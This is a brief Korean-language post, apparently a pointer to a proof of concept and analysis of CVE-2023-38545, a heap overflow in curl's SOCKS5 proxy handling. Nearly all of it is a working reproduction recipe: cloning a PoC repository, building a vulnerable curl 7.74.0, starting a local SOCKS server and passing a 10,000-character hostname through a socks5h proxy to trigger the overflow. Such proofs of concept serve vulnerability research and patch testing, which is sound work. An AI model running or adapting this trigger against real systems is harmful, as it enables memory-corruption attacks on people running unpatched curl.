
😄 CVE-2023-38545 힙 오버플로우 POC 및 분석 기사
git clone https://github.com/imfht/CVE-2023-38545
cd CVE-2023-38545/curl-7.74.0 && ./configure --with-openssl
make -j 4
python3 socks.py &
export ALL_PROXY=socks5h://127.0.0.1:9050
./curl-7.74.0/src/curl $(python3 -c "print(('A'*10000), end='')") -vvvv

자세한 내용은 다음을 참조하세요: 이 링크(중국어)